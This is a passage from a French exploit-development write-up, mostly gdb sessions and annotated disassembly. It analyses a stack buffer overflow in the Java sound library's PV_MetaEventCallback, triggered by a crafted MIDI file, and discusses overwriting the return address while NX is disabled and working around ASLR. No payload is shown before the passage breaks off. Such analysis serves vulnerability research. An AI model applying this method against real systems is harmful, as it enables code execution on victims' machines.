						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc482c904773333-1"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-st">break</span><span class="crayon-h"> </span><span class="crayon-e">PV_MetaEventCallback</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc482c904773333-2"><span class="crayon-i">Breakpoint</span><span class="crayon-h"> </span><span class="crayon-cn">1</span><span class="crayon-h"> </span><span class="crayon-i">at</span><span class="crayon-h"> </span><span class="crayon-cn">0x7f6db5e50980</span></div><div class="crayon-line" id="crayon-5997722bc482c904773333-3"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-i">c</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc482c904773333-4"><span class="crayon-v">Continuing</span><span class="crayon-sy">.</span></div><div class="crayon-line" id="crayon-5997722bc482c904773333-5"><span class="crayon-sy">[</span><span class="crayon-e">Switching </span><span class="crayon-st">to</span><span class="crayon-h"> </span><span class="crayon-i">Thread</span><span class="crayon-h"> </span><span class="crayon-cn">0x7f6dace07700</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-i">LWP</span><span class="crayon-h"> </span><span class="crayon-cn">21764</span><span class="crayon-sy">)</span><span class="crayon-sy">]</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc482c904773333-6">&nbsp;</div><div class="crayon-line" id="crayon-5997722bc482c904773333-7"><span class="crayon-i">Thread</span><span class="crayon-h"> </span><span class="crayon-cn">22</span><span class="crayon-h"> </span><span class="crayon-s">"java"</span><span class="crayon-h"> </span><span class="crayon-e">hit </span><span class="crayon-i">Breakpoint</span><span class="crayon-h"> </span><span class="crayon-cn">1</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f6db5e50980</span><span class="crayon-h"> </span><span class="crayon-st">in</span><span class="crayon-h"> </span><span class="crayon-e">PV_MetaEventCallback</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-v">from</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-v">opt</span><span class="crayon-o">/</span><span class="crayon-v">alex</span><span class="crayon-o">/</span><span class="crayon-v">oracle</span><span class="crayon-o">-</span><span class="crayon-v">jre</span><span class="crayon-o">/</span><span class="crayon-v">jdk1</span><span class="crayon-sy">.</span><span class="crayon-cn">6.0_01</span><span class="crayon-o">/</span><span class="crayon-v">jre</span><span class="crayon-o">/</span><span class="crayon-v">lib</span><span class="crayon-o">/</span><span class="crayon-v">amd64</span><span class="crayon-o">/</span><span class="crayon-v">libjsound</span><span class="crayon-sy">.</span><span class="crayon-v">so</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0022 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Voici l’état de la pile avant la copie dans le tableau :</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4831520010952" class="crayon-syntax crayon-theme-dark-terminal crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
(gdb) x/6gx $rsp
0x7f6dace066e8: 0x00007f6db5e5ab85 0x0000000000000000
0x7f6dace066f8: 0x00007f6db5e5d2fe 0x00000000000005c8
0x7f6dace06708: 0x0000000000000000 0x0000000000000000</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4831520010952-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4831520010952-2">2</div><div class="crayon-num" data-line="crayon-5997722bc4831520010952-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4831520010952-4">4</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4831520010952-1"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-v">x</span><span class="crayon-o">/</span><span class="crayon-cn">6gx</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-i">rsp</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4831520010952-2"><span class="crayon-cn">0x7f6dace066e8</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f6db5e5ab85</span><span class="crayon-h"> </span><span class="crayon-cn">0x0000000000000000</span></div><div class="crayon-line" id="crayon-5997722bc4831520010952-3"><span class="crayon-cn">0x7f6dace066f8</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f6db5e5d2fe</span><span class="crayon-h"> </span><span class="crayon-cn">0x00000000000005c8</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4831520010952-4"><span class="crayon-cn">0x7f6dace06708</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0x0000000000000000</span><span class="crayon-h"> </span><span class="crayon-cn">0x0000000000000000</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0009 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Nous allons placer un breakpoint à l’unique instruction <b>ret</b> de la fonction pour vérifier l’état de la pile après la copie dans le tableau.</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4836845971239" class="crayon-syntax crayon-theme-dark-terminal crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
(gdb) break *0x00007f6db5e50a1b
Breakpoint 2 at 0x7f6db5e50a1b</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4836845971239-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4836845971239-2">2</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4836845971239-1"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-st">break</span><span class="crayon-h"> </span><span class="crayon-o">*</span><span class="crayon-cn">0x00007f6db5e50a1b</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4836845971239-2"><span class="crayon-i">Breakpoint</span><span class="crayon-h"> </span><span class="crayon-cn">2</span><span class="crayon-h"> </span><span class="crayon-i">at</span><span class="crayon-h"> </span><span class="crayon-cn">0x7f6db5e50a1b</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0006 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Normalement, comme pour le code 32 bits, le code aura changé la valeur d’un octet en zéro quelque part dans la pile, après le tableau.</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc483b573128613" class="crayon-syntax crayon-theme-dark-terminal crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
(gdb) c
Continuing.

Thread 22 "java" hit Breakpoint 2, 0x00007f6db5e50a1b in PV_MetaEventCallback () from /opt/alex/oracle-jre/jdk1.6.0_01/jre/lib/amd64/libjsound.so
(gdb) x/6gx $rsp
0x7f6dace066e8: 0xAAAAAAAAAAAAAAAA 0xAAAAAAAAAAAAAAAA
0x7f6dace066f8: 0xAAAAAAAAAAAAAAAA 0xAAAAAAAAAAAAAAAA
0x7f6dace06708: 0xAAAAAAAAAAAAAAAA 0xAAAAAAAAAAAAAA00</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc483b573128613-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc483b573128613-2">2</div><div class="crayon-num" data-line="crayon-5997722bc483b573128613-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc483b573128613-4">4</div><div class="crayon-num" data-line="crayon-5997722bc483b573128613-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc483b573128613-6">6</div><div class="crayon-num" data-line="crayon-5997722bc483b573128613-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc483b573128613-8">8</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc483b573128613-1"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-i">c</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc483b573128613-2"><span class="crayon-v">Continuing</span><span class="crayon-sy">.</span></div><div class="crayon-line" id="crayon-5997722bc483b573128613-3">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc483b573128613-4"><span class="crayon-i">Thread</span><span class="crayon-h"> </span><span class="crayon-cn">22</span><span class="crayon-h"> </span><span class="crayon-s">"java"</span><span class="crayon-h"> </span><span class="crayon-e">hit </span><span class="crayon-i">Breakpoint</span><span class="crayon-h"> </span><span class="crayon-cn">2</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-cn">0x00007f6db5e50a1b</span><span class="crayon-h"> </span><span class="crayon-st">in</span><span class="crayon-h"> </span><span class="crayon-e">PV_MetaEventCallback</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-v">from</span><span class="crayon-h"> </span><span class="crayon-o">/</span><span class="crayon-v">opt</span><span class="crayon-o">/</span><span class="crayon-v">alex</span><span class="crayon-o">/</span><span class="crayon-v">oracle</span><span class="crayon-o">-</span><span class="crayon-v">jre</span><span class="crayon-o">/</span><span class="crayon-v">jdk1</span><span class="crayon-sy">.</span><span class="crayon-cn">6.0_01</span><span class="crayon-o">/</span><span class="crayon-v">jre</span><span class="crayon-o">/</span><span class="crayon-v">lib</span><span class="crayon-o">/</span><span class="crayon-v">amd64</span><span class="crayon-o">/</span><span class="crayon-v">libjsound</span><span class="crayon-sy">.</span><span class="crayon-e">so</span></div><div class="crayon-line" id="crayon-5997722bc483b573128613-5"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-v">x</span><span class="crayon-o">/</span><span class="crayon-cn">6gx</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-i">rsp</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc483b573128613-6"><span class="crayon-cn">0x7f6dace066e8</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0xAAAAAAAAAAAAAAAA</span><span class="crayon-h"> </span><span class="crayon-cn">0xAAAAAAAAAAAAAAAA</span></div><div class="crayon-line" id="crayon-5997722bc483b573128613-7"><span class="crayon-cn">0x7f6dace066f8</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0xAAAAAAAAAAAAAAAA</span><span class="crayon-h"> </span><span class="crayon-cn">0xAAAAAAAAAAAAAAAA</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc483b573128613-8"><span class="crayon-cn">0x7f6dace06708</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-cn">0xAAAAAAAAAAAAAAAA</span><span class="crayon-h"> </span><span class="crayon-cn">0xAAAAAAAAAAAAAA00</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0023 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Intéressant, il semble que le code 64 bits, contrairement au code 32 bits, copie le tableau source entier sur la pile ! Effectivement, en regardant le code assembleur il est clair que tout le tableau source y est copié.</span></p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->

		<div id="crayon-5997722bc4840687687894" class="crayon-syntax crayon-theme-dark-terminal crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Afficher/cacher numéros de lignes"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Basculer vers code brut"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Ouvrir le code dans une nouvelle fenêtre"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;">
(gdb) disas PV_MetaEventCallback
Dump of assembler code for function PV_MetaEventCallback:
[…]
// rcx pointe vers le tableau source
// esi est initialisé à 0 et représente le nombre d’octets copiés
// ebx contient le nombre d’octets à copier
0x00007f6db5e509b0 &lt;+48&gt;: movzbl (%rcx),%eax // lit un octet et le place dans eax
0x00007f6db5e509b3 &lt;+51&gt;: movslq %esi,%rdx // copie esi dans rdx avec extension du signe
0x00007f6db5e509b6 &lt;+54&gt;: inc %rcx // incrémente rcx
0x00007f6db5e509b9 &lt;+57&gt;: inc %esi // incrément esi
0x00007f6db5e509bb &lt;+59&gt;: cmp %ebx,%esi // reste-t-il des octets à copier ? [C1]
0x00007f6db5e509bd &lt;+61&gt;: mov %al,0x20(%rsp,%rdx,1) // copie un octet sur la pile
0x00007f6db5e509c1 &lt;+65&gt;: jl 0x7f6db5e509b0 &lt;PV_MetaEventCallback+48&gt; // oui pour C1
0x00007f6db5e509c3 &lt;+67&gt;: movslq %ebx,%rax // non pour C1
0x00007f6db5e509c6 &lt;+70&gt;: mov %ebx,%esi
0x00007f6db5e509c8 &lt;+72&gt;: mov %rbp,%rdi
0x00007f6db5e509cb &lt;+75&gt;: movb $0x0,0x20(%rsp,%rax,1) // rajoute l’octet 0x00 à la fin
[…]</textarea></div>
			<div class="crayon-main" style="">
				<table class="crayon-table">
					<tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-5997722bc4840687687894-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4840687687894-2">2</div><div class="crayon-num" data-line="crayon-5997722bc4840687687894-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4840687687894-4">4</div><div class="crayon-num" data-line="crayon-5997722bc4840687687894-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4840687687894-6">6</div><div class="crayon-num" data-line="crayon-5997722bc4840687687894-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4840687687894-8">8</div><div class="crayon-num" data-line="crayon-5997722bc4840687687894-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4840687687894-10">10</div><div class="crayon-num" data-line="crayon-5997722bc4840687687894-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4840687687894-12">12</div><div class="crayon-num" data-line="crayon-5997722bc4840687687894-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4840687687894-14">14</div><div class="crayon-num" data-line="crayon-5997722bc4840687687894-15">15</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4840687687894-16">16</div><div class="crayon-num" data-line="crayon-5997722bc4840687687894-17">17</div><div class="crayon-num crayon-striped-num" data-line="crayon-5997722bc4840687687894-18">18</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-5997722bc4840687687894-1"><span class="crayon-sy">(</span><span class="crayon-v">gdb</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-e">disas </span><span class="crayon-e">PV_MetaEventCallback</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4840687687894-2"><span class="crayon-e">Dump </span><span class="crayon-e">of </span><span class="crayon-e">assembler </span><span class="crayon-e">code </span><span class="crayon-st">for</span><span class="crayon-h"> </span><span class="crayon-t">function</span><span class="crayon-h"> </span><span class="crayon-v">PV_MetaEventCallback</span><span class="crayon-o">:</span></div><div class="crayon-line" id="crayon-5997722bc4840687687894-3"><span class="crayon-sy">[</span>…<span class="crayon-sy">]</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4840687687894-4"><span class="crayon-c">// rcx pointe vers le tableau source</span></div><div class="crayon-line" id="crayon-5997722bc4840687687894-5"><span class="crayon-c">// esi est initialisé à 0 et représente le nombre d’octets copiés</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4840687687894-6"><span class="crayon-c">// ebx contient le nombre d’octets à copier</span></div><div class="crayon-line" id="crayon-5997722bc4840687687894-7"><span class="crayon-cn">0x00007f6db5e509b0</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-o">+</span><span class="crayon-cn">48</span><span class="crayon-o">&gt;</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-e">movzbl</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-o">%</span><span class="crayon-v">rcx</span><span class="crayon-sy">)</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-v">eax</span><span class="crayon-h"> </span><span class="crayon-c">// lit un octet et le place dans eax</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4840687687894-8"><span class="crayon-cn">0x00007f6db5e509b3</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-o">+</span><span class="crayon-cn">51</span><span class="crayon-o">&gt;</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">movslq</span><span class="crayon-h"> </span><span class="crayon-o">%</span><span class="crayon-v">esi</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-v">rdx</span><span class="crayon-h"> </span><span class="crayon-c">// copie esi dans rdx avec extension du signe</span></div><div class="crayon-line" id="crayon-5997722bc4840687687894-9"><span class="crayon-cn">0x00007f6db5e509b6</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-o">+</span><span class="crayon-cn">54</span><span class="crayon-o">&gt;</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">inc</span><span class="crayon-h"> </span><span class="crayon-o">%</span><span class="crayon-v">rcx</span><span class="crayon-h"> </span><span class="crayon-c">// incrémente rcx</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4840687687894-10"><span class="crayon-cn">0x00007f6db5e509b9</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-o">+</span><span class="crayon-cn">57</span><span class="crayon-o">&gt;</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">inc</span><span class="crayon-h"> </span><span class="crayon-o">%</span><span class="crayon-v">esi</span><span class="crayon-h"> </span><span class="crayon-c">// incrément esi</span></div><div class="crayon-line" id="crayon-5997722bc4840687687894-11"><span class="crayon-cn">0x00007f6db5e509bb</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-o">+</span><span class="crayon-cn">59</span><span class="crayon-o">&gt;</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">cmp</span><span class="crayon-h"> </span><span class="crayon-o">%</span><span class="crayon-v">ebx</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-v">esi</span><span class="crayon-h"> </span><span class="crayon-c">// reste-t-il des octets à copier ? [C1]</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4840687687894-12"><span class="crayon-cn">0x00007f6db5e509bd</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-o">+</span><span class="crayon-cn">61</span><span class="crayon-o">&gt;</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">mov</span><span class="crayon-h"> </span><span class="crayon-o">%</span><span class="crayon-v">al</span><span class="crayon-sy">,</span><span class="crayon-cn">0x20</span><span class="crayon-sy">(</span><span class="crayon-o">%</span><span class="crayon-v">rsp</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-v">rdx</span><span class="crayon-sy">,</span><span class="crayon-cn">1</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-c">// copie un octet sur la pile</span></div><div class="crayon-line" id="crayon-5997722bc4840687687894-13"><span class="crayon-cn">0x00007f6db5e509c1</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-o">+</span><span class="crayon-cn">65</span><span class="crayon-o">&gt;</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-i">jl</span><span class="crayon-h"> </span><span class="crayon-cn">0x7f6db5e509b0</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-v">PV_MetaEventCallback</span><span class="crayon-o">+</span><span class="crayon-cn">48</span><span class="crayon-o">&gt;</span><span class="crayon-h"> </span><span class="crayon-c">// oui pour C1</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4840687687894-14"><span class="crayon-cn">0x00007f6db5e509c3</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-o">+</span><span class="crayon-cn">67</span><span class="crayon-o">&gt;</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">movslq</span><span class="crayon-h"> </span><span class="crayon-o">%</span><span class="crayon-v">ebx</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-v">rax</span><span class="crayon-h"> </span><span class="crayon-c">// non pour C1</span></div><div class="crayon-line" id="crayon-5997722bc4840687687894-15"><span class="crayon-cn">0x00007f6db5e509c6</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-o">+</span><span class="crayon-cn">70</span><span class="crayon-o">&gt;</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">mov</span><span class="crayon-h"> </span><span class="crayon-o">%</span><span class="crayon-v">ebx</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-i">esi</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4840687687894-16"><span class="crayon-cn">0x00007f6db5e509c8</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-o">+</span><span class="crayon-cn">72</span><span class="crayon-o">&gt;</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">mov</span><span class="crayon-h"> </span><span class="crayon-o">%</span><span class="crayon-v">rbp</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-i">rdi</span></div><div class="crayon-line" id="crayon-5997722bc4840687687894-17"><span class="crayon-cn">0x00007f6db5e509cb</span><span class="crayon-h"> </span><span class="crayon-o">&lt;</span><span class="crayon-o">+</span><span class="crayon-cn">75</span><span class="crayon-o">&gt;</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-i">movb</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-cn">0x0</span><span class="crayon-sy">,</span><span class="crayon-cn">0x20</span><span class="crayon-sy">(</span><span class="crayon-o">%</span><span class="crayon-v">rsp</span><span class="crayon-sy">,</span><span class="crayon-o">%</span><span class="crayon-v">rax</span><span class="crayon-sy">,</span><span class="crayon-cn">1</span><span class="crayon-sy">)</span><span class="crayon-h"> </span><span class="crayon-c">// rajoute l’octet 0x00 à la fin</span></div><div class="crayon-line crayon-striped-line" id="crayon-5997722bc4840687687894-18"><span class="crayon-sy">[</span>…<span class="crayon-sy">]</span></div></div></td>
					</tr>
				</table>
			</div>
		</div>
<!-- [Format Time: 0.0057 seconds] -->
<p><span style="font-family: Verdana, Geneva; font-size: 14px;">Nous pouvons donc remplacer n’importe quel octet sur la pile. Comme le bit NX n’est pas activé par défaut sous notre version de test de Debian testing, nous allons pouvoir mettre notre payload dans le fichier midi et le faire copier sur la pile pour l’exécuter. La technique classique lors de l’exploitation d’un débordement de tampon est de modifier la valeur de l’adresse de retour de la fonction (<span style="color: #ff0000;"><b>0x00007f6db5e5ab85</b></span> dans notre exemple) pour mettre l’adresse de notre payload. Cependant, comme ASLR est activé, l’adresse de la pile change à chaque exécution et nous ne pouvons donc pas savoir à l’avance quelle sera l’adresse de notre payload. Mais comment diable allons-nous trouver l’adresse de notre payload ? « Mystère et boule de gomme » dirait l’autre. Bon, récapitulons : nous pouvons modifier la pile, mais nous ne connaissons pas l’adresse de notre payload. Peut-être y a-t-il une adresse proche de notre adresse de payload quelque part sur la pile ? Relançons le programme. Voici 